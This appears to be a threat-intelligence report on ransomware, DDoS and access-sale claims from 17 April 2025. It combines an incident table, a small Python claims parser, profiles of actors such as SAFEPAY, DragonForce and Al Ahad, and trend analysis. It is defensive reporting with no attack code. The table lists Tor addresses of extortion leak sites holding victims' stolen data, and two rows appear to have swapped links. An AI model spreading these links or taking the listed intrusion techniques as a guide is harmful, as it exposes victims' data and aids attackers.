2025-04-17T05:23 | Ransomware | Space Bears | Evertech Instrumental Co., Ltd. (ETI) | Taiwan | Electrical & Electronic Mfg. | en.evertech.com.tw | tor | Claimed compromise, obtaining databases, financial docs, PII. Intent to publish in 6-7 days. | http://5butbkrljkaorg5maepuca25oma7eiwo6a2rlhvkblb4v6mf3ki2ovid.onion/companies/69/evertech-instrumental-co-ltd | https://d34iuop8pidsy8.cloudfront.net/60c111e9-0b56-425e-b458-a82d00d0c9eb.png |
2025-04-17T04:03 | DDoS Attack | Al Ahad | 4chan | USA | Social Media & Online Networking | 4chan.org | telegram | Claimed DDoS attack, provided proof link. | https://t.me/qayzerowns/111 | https://d34iuop8pidsy8.cloudfront.net/f6c2d4e1-97cc-47f9-9b6d-a5638d1d1064.png, https://d34iuop8pidsy8.cloudfront.net/276cb26a-8d51-4e97-ae22-e09667cf7c7c.png |
2025-04-17T03:10 | DDoS Attack | Al Ahad | Győr-Pér International Airport | Hungary | Airlines & Aviation | gyor-perairport.hu | telegram | Claimed DDoS attack, provided proof link. | https://t.me/qayzerowns/109 | https://d34iuop8pidsy8.cloudfront.net/1347cf73-e8fc-4d78-b77e-1390b888926e.png |
2025-04-17T03:03 | DDoS Attack | Al Ahad | Budapest Airport | Hungary | Aviation & Aerospace | bud.hu | telegram | Claimed DDoS attack, provided proof link. | https://t.me/qayzerowns/109 | https://d34iuop8pidsy8.cloudfront.net/fc14fc41-a70f-4ca8-84dc-6c137865b0ff.png |
2025-04-17T02:59 | Ransomware | RALord | Bio-Clima Service Srl | Italy | Medical Equipment Manufacturing | bioclimaservice.it | tor | Claimed 50GB data exfiltrated. Intent to publish in 7-8 days. | http://ralord3htj7v2dkavss2hjzviviwgsf4anfdnihn5qcjl6eb5if3cuqd.onion/bioclimaservice/ | https://d34iuop8pidsy8.cloudfront.net/01866048-defb-42fb-8144-ba27b7fd31d9.png |
2025-04-17T02:42 | Initial Access | SECT0R16 (OverFlame) | Palazzo Raja | Italy | Events Services | palazzoraja.com | telegram | Claimed access to heating system. | https://t.me/SECTOR1616/80 | https://d34iuop8pidsy8.cloudfront.net/c7db24bd-d8cb-4d71-84a3-920a847e3e8d.png |
2025-04-17T02:22 | Ransomware | Space Bears | Viñuelas Abogados | Spain | Law Practice & Law Firms | viñuelasabogados.es | tor | Claimed compromise, obtaining client legal info, financial docs, PII. Intent to publish in 7-8 days. | http://5butbkrljkaorg5maepuca25oma7eiwo6a2rlhvkblb4v6mf3ki2ovid.onion/companies/68/vinuelas-abogados | https://d34iuop8pidsy8.cloudfront.net/af37a5e3-2e31-4dff-9c0c-178d40ab9916.png |
2025-04-17T01:49 | Ransomware | DragonForce | City of Grove | USA | Government Administration | cityofgroveok.gov | tor | Claimed 78.92GB data exfiltrated. Intent to publish in 5-6 days. | http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion/blog | https://d34iuop8pidsy8.cloudfront.net/029c1e7a-3bbd-4a17-8f69-fb67a605d2bd.png |
2025-04-17T01:44 | Ransomware | DragonForce | Iris ID Systems Inc | USA | Information Technology (IT) Services | irisid.com | tor | Claimed 204.66GB data exfiltrated. Intent to publish in 5-6 days. | http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion/blog | https://d34iuop8pidsy8.cloudfront.net/540734b6-dcc0-4abf-afbb-6a87c09a7460.png |
2025-04-17T01:25 | Ransomware | MEDUSA | Lithium Americas Corp. | Canada | Mining/Metals | lithiumamericas.com | tor | Claimed compromise, data obtained (volume unspecified). Intent to publish in 8-9 days. Sample screenshots available. | http://xfv4jzckytb4g3ckwemcny3ihv4i5p4lqzdpi624cxisu35my5fwi5qd.onion/detail?id=dd71a1d456e3d42c9c8c57a250c12f22 | https://d34iuop8pidsy8.cloudfront.net/eee48941-85a7-469b-a997-3a3a3b038362.png |
2025-04-17T01:22 | Ransomware | SAFEPAY | Stadt Heilbronn | Germany | Government Administration | heilbronn.de | tor | Claimed 85GB data exfiltrated. Intent to publish in 3-4 days. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#heilbronn | https://d34iuop8pidsy8.cloudfront.net/7cf32e94-4e71-4475-86a3-47a35bc005cb.png |
2025-04-17T01:16 | Ransomware | SAFEPAY | Kellermann & Engelhardt ITEC GmbH | Germany | Building and construction | itec-gmbh.com | tor | Claimed 70GB data exfiltrated. No publication timeline stated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#itec | https://d34iuop8pidsy8.cloudfront.net/c1054547-b95e-46c8-84c5-5ae525ebfbd8.png |
2025-04-17T01:02 | Ransomware | SAFEPAY | Heinrich + Steinhardt GmbH | Germany | Architecture & Planning | heinrich-steinhardt.de | tor | Claimed 49GB data exfiltrated. Intent to publish in 3-4 days. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#heinrich | https://d34iuop8pidsy8.cloudfront.net/67578237-9657-461d-95b1-472ae2fc4e94.png |
2025-04-17T00:57 | Ransomware | SAFEPAY | Helix Tool | UK | Manufacturing | helixtools.co.uk | tor | Claimed 239GB data exfiltrated. Intent to publish in 3-4 days. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#helixtools | https://d34iuop8pidsy8.cloudfront.net/5663b5b4-9545-471c-b7c2-dc2e3cd14f9f.png |
2025-04-17T00:54 | Ransomware | SAFEPAY | Hurst + Schröder GmbH | Germany | Manufacturing | hurst-schroeder.de | tor | Claimed 239GB data exfiltrated. Intent to publish in 3-4 days. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#hurst-schroeder | https://d34iuop8pidsy8.cloudfront.net/4372b10d-e570-4bfe-b9a6-d785a470d560.png |
2025-04-17T00:46 | DDoS Attack | Al Ahad | Government of Hungary | Hungary | Government Administration | kormany.hu | telegram | Claimed DDoS attack, provided proof link. | https://t.me/qayzerowns/108 | https://d34iuop8pidsy8.cloudfront.net/7edac5f6-a218-4858-a9f8-bb4992bb78d5.png |
2025-04-17T00:21 | DDoS Attack | Dark Storm Team | BreachForums | USA | Computer & Network Security | breachforums.st | telegram | Claimed DDoS attack, provided proof links. | https://t.me/DarkStormTeam3/312 | https://d34iuop8pidsy8.cloudfront.net/e87d4758-890b-4352-bcea-84710af36255.png |
2025-04-17T00:16 | Ransomware | SAFEPAY | Extreme Fire Solutions | Australia | Building and construction | extremefire.com.au | tor | Claimed 47GB data exfiltrated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#extremefire | https://d34iuop8pidsy8.cloudfront.net/841ad567-c496-43a7-903c-eee8d7919b8e.png |
2025-04-17T00:13 | Ransomware | SAFEPAY | Eichele Bauunternehmung | Germany | Building and construction | eichele-bau.de | tor | Claimed 91GB data exfiltrated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#eichele | https://d34iuop8pidsy8.cloudfront.net/e878aea0-2403-412b-a781-1b1cc52fbf62.png |
2025-04-17T00:13 | Ransomware | SAFEPAY | Gebr. Förster GmbH | Germany | Environmental Services | foerster-schwanau.de | tor | Claimed 15GB data exfiltrated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#frapack | https://d34iuop8pidsy8.cloudfront.net/6d76119a-419b-4aa7-a317-80f3f0872518.jpg |
2025-04-17T00:13 | Ransomware | SAFEPAY | FRAPACK GmbH | Germany | Transportation & Logistics | frapack.de | tor | Claimed 50GB data exfiltrated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#foerster | https://d34iuop8pidsy8.cloudfront.net/e63053e9-e5bd-4f49-b1a5-a8514d99df4a.jpg |
2025-04-17T00:05 | Ransomware | SAFEPAY | Gemeinde Kirkel | Germany | Government Administration | kirkel.de | tor | Claimed 75 GB data exfiltrated. | http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#kirkel | https://d34iuop8pidsy8.cloudfront.net/67694e8b-d6f5-4d63-8bdf-6bc02de4ecc2.png |
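The incident rows above share one pipe-delimited layout. As an added example (not part of the report), the Python below parses rows in that layout and builds the kind of per-actor claims summary the report's tables present, normalising stated volumes to GB and extracting the threatened publication window; the column order is inferred from the rows shown, and the sample rows are constructed with placeholder URLs and one made-up victim.

```python
"""Parser and per-actor summariser for pipe-delimited incident rows in the
layout used by this report's incident table. Added example, not part of the
report: the column order is inferred from the rows above and the sample rows
below are constructed, with placeholder URLs in place of the real links."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional, Tuple

# Column order assumed from the incident rows shown in the report.
COLUMNS = ["timestamp", "category", "actor", "victim", "country", "industry",
           "domain", "platform", "description", "source_url", "screenshot_url"]

# Constructed sample rows in the same layout (placeholder URLs, one made-up victim).
SAMPLE_ROWS = """\
2025-04-17T01:49 | Ransomware | DragonForce | City of Grove | USA | Government Administration | cityofgroveok.gov | tor | Claimed 78.92GB data exfiltrated. Intent to publish in 5-6 days. | http://PLACEHOLDER.onion/blog | https://PLACEHOLDER/1.png |
2025-04-17T01:25 | Ransomware | MEDUSA | Lithium Americas Corp. | Canada | Mining/Metals | lithiumamericas.com | tor | Claimed compromise, data obtained (volume unspecified). Intent to publish in 8-9 days. Sample screenshots available. | http://PLACEHOLDER.onion/detail | https://PLACEHOLDER/2.png |
2025-04-17T00:57 | Ransomware | SAFEPAY | Helix Tool | UK | Manufacturing | helixtools.co.uk | tor | Claimed 239GB data exfiltrated. Intent to publish in 3-4 days. | http://PLACEHOLDER.onion/#helixtools | https://PLACEHOLDER/3.png |
2025-04-17T00:05 | Ransomware | SAFEPAY | Gemeinde Kirkel | Germany | Government Administration | kirkel.de | tor | Claimed 75 GB data exfiltrated. | http://PLACEHOLDER.onion/#kirkel | https://PLACEHOLDER/4.png |
2025-04-17T00:30 | Ransomware | Sarcoma | Example Foundation (constructed) | Taiwan | Arts & Crafts | example-foundation.invalid | tor | Claimed 1.6TB data exfiltrated. Intent to publish in 8-9 days. | http://PLACEHOLDER.onion/x | https://PLACEHOLDER/5.png |
2025-04-17T00:46 | DDoS Attack | Al Ahad | Government of Hungary | Hungary | Government Administration | kormany.hu | telegram | Claimed DDoS attack, provided proof link. | https://PLACEHOLDER/claim | https://PLACEHOLDER/6.png |
"""

VOLUME_RE = re.compile(r"(\d+(?:\.\d+)?)\s*(MB|GB|TB)\b", re.IGNORECASE)
DEADLINE_RE = re.compile(r"publish\s+in\s+(\d+)(?:-(\d+))?\s+days?", re.IGNORECASE)


@dataclass
class Incident:
    timestamp: str
    category: str
    actor: str
    victim: str
    country: str
    industry: str
    domain: str
    platform: str
    description: str
    source_url: str
    screenshot_url: str
    claimed_gb: Optional[float]               # stated volume normalised to GB (decimal units)
    deadline_days: Optional[Tuple[int, int]]  # (earliest, latest) day of threatened publication


def parse_volume_gb(description: str) -> Optional[float]:
    """'78.92GB' -> 78.92, '1.6TB' -> 1600.0, '75 GB' -> 75.0; None when no volume is stated."""
    m = VOLUME_RE.search(description)
    if not m:
        return None
    factor = {"MB": 0.001, "GB": 1.0, "TB": 1000.0}[m.group(2).upper()]
    return round(float(m.group(1)) * factor, 2)


def parse_deadline(description: str) -> Optional[Tuple[int, int]]:
    """'Intent to publish in 5-6 days' -> (5, 6); 'publish in 7 days' -> (7, 7)."""
    m = DEADLINE_RE.search(description)
    if not m:
        return None
    low = int(m.group(1))
    return (low, int(m.group(2)) if m.group(2) else low)


def parse_row(line: str) -> Incident:
    # Rows end with a trailing separator; drop it, then split on the remaining pipes.
    fields = [f.strip() for f in line.strip().rstrip("|").split("|")]
    if len(fields) != len(COLUMNS):
        raise ValueError(f"expected {len(COLUMNS)} fields, got {len(fields)}: {line[:60]!r}")
    rec = dict(zip(COLUMNS, fields))
    return Incident(**rec,
                    claimed_gb=parse_volume_gb(rec["description"]),
                    deadline_days=parse_deadline(rec["description"]))


def parse_rows(text: str):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def summarise_by_actor(incidents, category="Ransomware"):
    """Per actor within one category: number of claims, total stated volume in GB,
    how many claims stated no volume, and the shortest threatened publication window."""
    summary = defaultdict(lambda: {"claims": 0, "claimed_gb": 0.0,
                                   "volume_unstated": 0, "min_deadline_days": None})
    for inc in incidents:
        if inc.category != category:
            continue
        s = summary[inc.actor]
        s["claims"] += 1
        if inc.claimed_gb is None:
            s["volume_unstated"] += 1
        else:
            s["claimed_gb"] = round(s["claimed_gb"] + inc.claimed_gb, 2)
        if inc.deadline_days is not None:
            low = inc.deadline_days[0]
            if s["min_deadline_days"] is None or low < s["min_deadline_days"]:
                s["min_deadline_days"] = low
    return dict(summary)


if __name__ == "__main__":
    for actor, stats in sorted(summarise_by_actor(parse_rows(SAMPLE_ROWS)).items()):
        print(f"{actor:12} {stats}")
```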
4. Threat Actor Spotlight
Understanding the specific actors behind cyber threats is crucial for effective defense. This section profiles the key threat actors identified in the April 17, 2025 incident data and supported by the available research, detailing their likely motivations, operational methods, and observed activities.
Hacktivist Groups
Hacktivist groups leverage cyberattacks, primarily DDoS, to promote political, ideological, or social agendas. Their operations often coincide with real-world events and conflicts.
- NoName057(16):
- Profile: A prominent pro-Russian hacktivist group that emerged in March 2022 following Russia’s invasion of Ukraine.1 Their primary motivation is geopolitical, aiming to disrupt and destabilize Ukraine and NATO member states or other countries perceived as supporting Ukraine.1 They operate with the goal of silencing anti-Russian narratives and undermining support networks for Ukraine.1 The group may collaborate with others, such as the People’s Cyber Army (PCA), within broader pro-Russian cyber coalitions like CARRtel.21
- TTPs: NoName057(16) specializes in DDoS attacks. They developed and utilize a custom tool named “DDoSia,” a multi-threaded application designed to overwhelm target websites with network requests.1 To amplify their attacks, they build botnets by infecting servers with the Bobik malware, often distributed via the RedLine Stealer.1 Telegram serves as their central hub for communication, coordination, claiming responsibility for attacks, recruiting volunteers, and disseminating propaganda to tens of thousands of subscribers.1 They have also used GitHub to host their DDoS tool and related resources.22 While primarily focused on DDoS, they have occasionally employed other tactics like phishing websites.1 Reports suggest a success rate of around 40% for their attacks, indicating a notable level of effectiveness.1
- Observed Activity (Apr 17): This group was highly active, claiming responsibility for numerous DDoS attacks targeting a wide array of Ukrainian and Polish organizations. The victims spanned government agencies, defense contractors, manufacturers (including chemical and transport equipment), financial institutions, and aviation services. This activity aligns perfectly with their established modus operandi and geopolitical objectives, demonstrating a sustained and focused campaign against key Ukrainian entities and Polish supporters. Their ability to hit diverse sectors suggests a capacity for target identification and sustained operational tempo, making them a persistent disruptive threat, particularly to nations opposing Russian interests.
- Al Ahad:
- Profile: An Iraqi hacktivist group with a stated anti-Israeli and pro-Palestinian ideology.17 They target entities perceived as supporting Israel or Western interests.16 They may operate within larger alliances of ideologically aligned hacktivist groups, such as the Holy League, which unites pro-Palestinian and pro-Russian actors.18
- TTPs: Their primary tactic appears to be DDoS attacks.16 They utilize Telegram for communication and attack claims. Despite announcing a planned migration to Signal in late 2024 due to Telegram’s policy changes regarding cooperation with law enforcement, the group maintained an active presence on Telegram under a modified name (“Al Ahad Security”), reposting information about pro-Palestinian cyber activities.17 This decision likely reflects the importance of Telegram’s large audience and established communication channels for hacktivist operations, which can outweigh platform-related security or privacy concerns for groups prioritizing visibility and recruitment.17
- Observed Activity (Apr 17): Claimed DDoS attacks against the US-based imageboard 4chan and two international airports in Hungary (Budapest and Győr-Pér). The targeting aligns with a broad anti-Western stance, hitting a prominent US online platform and critical infrastructure (airports) in an EU/NATO member state.
- NATION OF SAVIORS:
- Profile: Limited information is available for this group beyond the April 17 incidents. Based on their name and use of DDoS tactics claimed via Telegram, they fit the general profile of a hacktivist group.
- TTPs: Conducted DDoS attacks, using check-host.net links as proof, and announced activities on Telegram.
- Observed Activity (Apr 17): Targeted four specific commercial establishments (spas) in Dhaka, Bangladesh. This targeting is atypical compared to the geopolitical or large-scale critical infrastructure targets usually associated with prominent international hacktivist campaigns.2 This suggests their motivations might be localized (e.g., related to social or religious issues within Bangladesh) or that they are a smaller, less strategically focused group engaging in opportunistic disruption. Further monitoring is necessary to determine their specific ideology and scope.
- SECT0R16:
- Profile: A hacktivist group that emerged around January 2025, potentially with Russian links.19 Their stated motivations include exposing abuses of power and corruption, with operational focus suggesting geopolitical aims against US oil infrastructure and potentially broader opposition to major powers (US, EU, Russia).19 They emphasize targeting critical infrastructure, particularly OT/ICS environments.
- TTPs: Known for employing advanced techniques targeting SCADA systems and control panels, particularly in the oil, gas, and water sectors.19 Their methods include vulnerability exploitation, social engineering, manipulation of control interfaces, and data exfiltration. They operate collaboratively, with known alliances with Z-Pentest and OverFlame, enhancing their capabilities.19 They utilize Telegram, YouTube, and darknet forums for communication and employ sophisticated psychological manipulation and social engineering tactics in their operations and recruitment.19
- Observed Activity (Apr 17): Claimed initial access to the heating system of Palazzo Raja, an events venue in Italy, stating the operation was aided by OverFlame. This claim, targeting a building automation system (related to OT/ICS), aligns with their documented focus on control systems, even if the target itself is not traditional critical infrastructure. It may serve as a demonstration of capability or an opportunistic target. The collaboration with OverFlame is consistent with their reported alliances.19
Ransomware Operations
Ransomware groups primarily operate for financial gain, employing encryption and data theft to extort victims. Many function under a RaaS model.
- Sarcoma:
- Profile: A ransomware group that surfaced in late 2023 or early 2024.6 Their motivation is financial gain through extortion.6
- TTPs: Employs a double extortion strategy, claiming significant data exfiltration volumes and threatening publication within relatively short timeframes (typically 6-9 days in the observed incidents). They utilize strong encryption (AES-256 with RSA-4096) and have incorporated fileless execution techniques using legitimate tools like PowerShell and WMI to evade detection.6 They target a diverse range of industries and geographical locations.6
- Observed Activity (Apr 17): Claimed compromises of five organizations across the USA, Italy, UK, and Taiwan in sectors including Real Estate, Transportation, Banking, Facilities Services, and Arts. The claimed data volumes varied significantly, from 6GB to an exceptionally large 1.6TB. This wide range might reflect diverse victim data holdings or potential exaggeration in claims to increase pressure. Their rapid emergence coupled with sophisticated TTPs suggests experienced operators may be behind this group.6
- Qilin (Agenda):
- Profile: A well-established RaaS operation active since July 2022.5 The ransomware is written in Go and, more recently, Rust, allowing for cross-platform attacks.6 The group has Russian-speaking origins 24 and demands high ransoms.5
- TTPs: Offers a highly customizable RaaS platform to affiliates.5 Standard TTPs include double extortion, publishing stolen data on a dedicated leak site.5 Initial access is gained through compromised RDP, phishing, or exploiting public-facing applications like Veeam Backup & Replication (e.g., CVE-2023-27532).5 They establish persistence using scheduled tasks and employ techniques like process injection and defense evasion (e.g., rebooting into Safe Mode).5 They target both Windows and Linux systems across critical infrastructure sectors globally.5
- Observed Activity (Apr 17): Claimed attacks against three US organizations in Manufacturing, Hospitality & Tourism, and Education. The specific, sensitive data types claimed (customer details, payroll summaries, student PII/academic records) align perfectly with their double extortion model and focus on maximizing leverage through data theft.5
- SAFEPAY:
- Profile: Active since October 2024.8 They claim not to operate as a RaaS, suggesting a potentially closed or private group.8 Their motivation is purely financial.8
- TTPs: Known to gain initial access by exploiting exposed RDP endpoints.7 They employ sophisticated defense evasion techniques using LOLBins (e.g., SystemSettingsAdminFlows.exe to disable Windows Defender) and custom scripts (ShareFinder.ps1 for network reconnaissance).7 Privilege escalation is achieved via UAC bypass techniques involving COM object abuse, similar to LockBit.7 They actively terminate security processes and critical services (databases, backups, antivirus) to facilitate encryption and hinder recovery.7 They practice double extortion, notable for imposing very short deadlines (3-4 days observed) for data publication.8 Encrypted files receive a .safepay extension.7
- Observed Activity (Apr 17): Claimed five victims, predominantly in Germany (4) and one in the UK. Targets included government, construction, architecture, and manufacturing sectors. The geographic clustering and short deadlines suggest a potentially focused campaign designed for rapid pressure and payout. Their denial of being a RaaS group, despite sophisticated TTPs and multiple victims, warrants further investigation into their structure.8
- Space Bears:
- Profile: A newer ransomware group, emerging in early 2024.9 They are reportedly aligned with the established Phobos RaaS platform 26 and are believed to operate from Moscow.26
- TTPs: Target both Windows and Linux environments.9 Initial access vectors include exploiting RDP vulnerabilities, phishing emails, and software supply chain compromises.9 They employ double extortion tactics and may threaten DDoS attacks against non-compliant victims.9 A distinguishing feature is their use of a “corporate” styled data leak site, presenting a more professional facade than typical ransomware groups.9 They primarily target large enterprises and critical infrastructure.9
- Observed Activity (Apr 17): Claimed compromises of a Taiwanese electronics manufacturer (Evertech Instrumental) and a Spanish law firm (Viñuelas Abogados). These targets fit their focus on enterprise victims. The unique corporate branding might be an attempt to differentiate themselves within the broader Phobos RaaS ecosystem or a specific psychological tactic.27
- DragonForce:
- Profile: Originating from Malaysia, this group initially engaged in hacktivism (pro-Palestinian) before evolving into a RaaS operation in late 2023.28 While potentially retaining some ideological roots, their current operations appear primarily financially driven. They actively recruit affiliates via forums like RAMP, offering a high commission rate (up to 80%).29
- TTPs: Operates a RaaS supporting Windows, Linux, and ESXi environments.12 They possess a notably advanced and flexible payload builder for affiliates.12 Initial access is gained through phishing or exploiting vulnerabilities in RDP and VPN solutions, including specific CVEs like CVE-2021-44228 (Log4Shell), CVE-2023-46805/CVE-2024-21887 (Ivanti), and CVE-2024-21412 (Windows Defender bypass).12 They practice double extortion and employ aggressive tactics, such as publishing audio recordings of ransom negotiations on their dark web DLS.12 Their DLS also features advanced CAPTCHA mechanisms to hinder automated tracking.29 They target organizations globally, with notable activity in the Middle East (Saudi Arabia).29
- Observed Activity (Apr 17): Claimed attacks against a US city government (City of Grove) and a US IT services company (Iris ID Systems). These targets demonstrate their continued global operations targeting diverse sectors. Their use of unique pressure tactics and sophisticated tooling highlights their focus on maximizing extortion success through their RaaS platform.
- MEDUSA:
- Profile: A long-standing RaaS operation, active since June 2021.10 By early 2025, they had impacted over 300 victims across critical infrastructure sectors.13 While operating an affiliate model, core functions like ransom negotiation remain centrally controlled by the developers.10 Their motivation is financial.
- TTPs: Known for double extortion and potentially triple extortion tactics (demanding further payment after an initial ransom).10 They recruit Initial Access Brokers (IABs).10 Initial access is gained via phishing or exploiting vulnerabilities like CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet EMS).10 They heavily utilize Living-off-the-Land (LOTL) techniques (PowerShell, WMI, certutil) and legitimate remote access tools (AnyDesk, ConnectWise, Splashtop, etc.) for stealth and evasion.10 Defense evasion includes script obfuscation and attempts to disable EDR using vulnerable drivers (BYOVD).10 Data exfiltration often uses Rclone.10 Their encryptor is typically named gaze.exe, and encrypted files get a .medusa extension.10
- Observed Activity (Apr 17): Claimed compromise of Lithium Americas Corp., a Canadian mining company. This targeting of a major industrial entity aligns with their history of hitting critical sectors. Their longevity and high victim count attest to the effectiveness of their stealth-focused TTPs, particularly the abuse of legitimate tools.10
- RALord:
- Profile: A very new RaaS group that emerged in late March 2025.11 Their ransomware is reportedly Rust-based.31 They offer a high affiliate commission (85%).11 There are potential, unconfirmed links to the older RAWorld/RAGroup.11 Motivation is financial.
- TTPs: Operates a RaaS model where affiliates likely provide initial access.11 Their DLS is written in Russian and English and uses countdown timers to pressure victims.11 They accept various payment methods (crypto, possibly bank transfer) and offer escrow services.11 Unusually, they also offer their encryption tool for sale separately from the full RaaS program.11 Encrypted files have the .RALord extension.31 Initial victims were located in South America and Europe.11
- Observed Activity (Apr 17): Claimed compromise of Bio-Clima Service Srl, an Italian medical equipment manufacturer. This adds another European target to their early victim list, likely reflecting opportunistic targeting as they establish their operation. Their use of Rust aligns with modern ransomware development trends aimed at performance and evasion.31 The flexible RaaS structure aims to attract affiliates quickly in a competitive market.11
Initial Access & Tool Vendors
These actors facilitate cybercrime by providing the necessary entry points or tools for other attackers.
- cryptoday:
- Profile: An actor observed operating on the exploit[.]in underground forum. Their moniker might suggest an interest or involvement in cryptocurrency-related activities.32
- TTPs/Activity (Apr 17): Offered administrative access credentials for a WordPress WooCommerce online shop belonging to an unidentified US organization.
- Significance: This activity directly supplies high-privilege access to e-commerce platforms, which are valuable targets for financial fraud, payment card skimming, customer data theft, and ransomware deployment. It exemplifies the specialized market for specific types of initial access.
- Xirosina:
- Profile: An actor observed operating on the exploit[.]in underground forum.
- TTPs/Activity (Apr 17): Advertised the sale of software designed for checking corporate access credentials and performing brute-force attacks. The tool targets common enterprise perimeter services, including VPNs, ADFS, Citrix, CPanel, RDWeb, and Outlook Web App (OWA). It reportedly includes support for using proxies to obfuscate the attacker’s origin and evade detection.
- Significance: This highlights the availability of specialized, automated tools that lower the barrier for conducting widespread initial access attempts against common corporate infrastructure components. The focus on frequently targeted services 5 and the inclusion of evasion features (proxy support) indicate a tool designed to facilitate the critical first stage of many network intrusions.
Table 2: Threat Actor Overview (Observed April 17, 2025)
Threat Actor | Type | Primary Motivation(s) | Key TTPs | Primary Targets (Observed/Reported) | Communication Platform(s) | Notable Characteristics |
NoName057(16) | Hacktivist | Geopolitical (Pro-Russian) | DDoS (DDoSia tool, Bobik botnet), Telegram coordination, GitHub hosting 1 | Ukraine, Poland (Govt, Defense, Mfg, Finance, Aviation) 1 | Telegram, GitHub | High volume DDoS, strong geopolitical alignment, ~40% success rate.1 |
Al Ahad | Hacktivist | Geopolitical (Pro-Palestine) | DDoS, Telegram coordination (maintained despite Signal move attempt) 16 | USA (Social Media), Hungary (Airports) 16 | Telegram (Signal attempted) | Part of anti-Israel/anti-Western hacktivist ecosystem.16 |
NATION OF SAVIORS | Hacktivist | Unclear (Potentially Local) | DDoS, Telegram claims | Bangladesh (Hospitality, Cosmetics) | Telegram | Atypical targeting (local commercial) compared to major geopolitical groups. |
SECT0R16 | Hacktivist | Geopolitical/Anti-Corruption | Advanced OT/ICS targeting (SCADA), Vuln exploit, Social Eng, Alliances (Z-Pentest, OverFlame) 19 | Italy (Building Control – claimed), US/NL (Oil/Water reported) 19 | Telegram, Dark Forums | Focus on critical infrastructure control systems, psychological manipulation tactics.19 |
Sarcoma | Ransomware | Financial | Double Extortion, Large data claims (up to 1.6TB), Short timelines, AES/RSA encryption, Fileless exec 6 | USA, Italy, UK, Taiwan (Real Estate, Transport, Banking, Facilities, Arts) | Tor | Rapid emergence, sophisticated TTPs, aggressive extortion.6 |
Qilin (Agenda) | Ransomware (RaaS) | Financial | Customizable RaaS, Double Extortion, RDP/Phishing/Vuln access (CVE-2023-27532), Evasion (Safe Mode) 5 | USA (Mfg, Hospitality, Education), Global Critical Infra 5 | Tor | Go/Rust based, Russian-speaking origins, targets Windows/Linux.5 |
SAFEPAY | Ransomware | Financial | Double Extortion, RDP access, LOLBins/Scripting evasion, UAC Bypass, Process Termination, Short deadlines 7 | Germany, UK (Govt, Construction, Architecture, Mfg) 7 | Tor | Claims not RaaS 8, sophisticated TTPs, very short (3-4 day) deadlines. |
Space Bears | Ransomware (RaaS) | Financial | Double Extortion, RDP/Phishing/Supply Chain access, Potential DDoS threat, Phobos RaaS aligned 9 | Taiwan, Spain (Electronics Mfg, Law), Large Enterprises/Infra 9 | Tor | Moscow-based (alleged) 26, unique “corporate” leak site branding.9 |
DragonForce | Ransomware (RaaS) | Financial (Ex-Hacktivist?) | Advanced RaaS builder, Double Extortion, Phishing/RDP/VPN access (CVEs), Publishes audio, CAPTCHA DLS 12 | USA (Govt, IT), Saudi Arabia (Real Estate reported) 29 | Tor, RAMP Forum | Malaysian origins 28, high affiliate commission (80%) 12, aggressive/unconventional tactics.12 |
MEDUSA | Ransomware (RaaS) | Financial | Double/Triple Extortion, IAB recruitment, LOTL/Legit tool abuse, Evasion (BYOVD), Rclone exfil 10 | Canada (Mining), Global Critical Infra (>300 victims) 13 | Tor | Long active (since 2021), high victim count, stealth focus via LOTL.10 |
RALord | Ransomware (RaaS) | Financial | New RaaS (Rust), Double Extortion, High commission (85%), Sells tool separately, Escrow option 11 | Italy (Medical Mfg), S. America/Europe (initial targets) 11 | Tor, Cybercrime Forum | Very recent emergence (Mar 2025), potential RAWorld links.11 |
cryptoday | Initial Access Vendor | Financial | Selling WP WooCommerce admin access | USA (Unidentified Org) | Openweb Forum (exploit[.]in) | Provides direct access to valuable e-commerce targets. |
Xirosina | Tool Vendor | Financial | Selling Corp Access Checker/Brute-Forcer (VPNs, Web Panels, OWA) with proxy support | Not Applicable | Openweb Forum (exploit[.]in) | Provides automated tools for initial compromise attempts against common enterprise services. |
5. Key Attack Trends and Techniques
Analysis of the incidents from April 17, 2025, reveals several prominent trends and techniques employed by threat actors, reflecting the current state of the cyber threat landscape.
DDoS Campaigns: Geopolitics and Tactics
- Geopolitical Motivation: The overwhelming majority of DDoS attacks observed were directly linked to ongoing geopolitical conflicts. NoName057(16)’s campaign against Ukraine and Poland is a clear example of hacktivism being used as a tool in the Russia-Ukraine war, aiming to disrupt infrastructure and demonstrate opposition.1 Similarly, Al Ahad’s targeting aligns with pro-Palestinian/anti-Western sentiments often tied to the Israeli-Palestinian conflict.16 This trend highlights how nation-state conflicts spill over into cyberspace, with non-state actors (or potentially state-sponsored fronts 2) using DDoS as a low-cost, high-visibility weapon.
- Tooling and Coordination: Groups like NoName057(16) utilize custom tools like DDoSia, likely deployed via botnets built using malware such as Bobik.1 Coordination and target dissemination heavily rely on platforms like Telegram, which enables rapid communication and mobilization of participants within large subscriber bases.1 The use of public proof-of-downtime services (check-host.net) is standard practice for claiming success.
- Targeting Strategy: DDoS targets are often selected for maximum disruption or symbolic value. Attacks against government websites, financial institutions, and transportation services aim to impede daily life and state functions.1 Targeting critical infrastructure, including energy and potentially OT/ICS environments 3, represents a more severe escalation. Symbolic targets like media outlets or specific websites (e.g., 4chan) are chosen for propaganda value or to express ideological opposition.
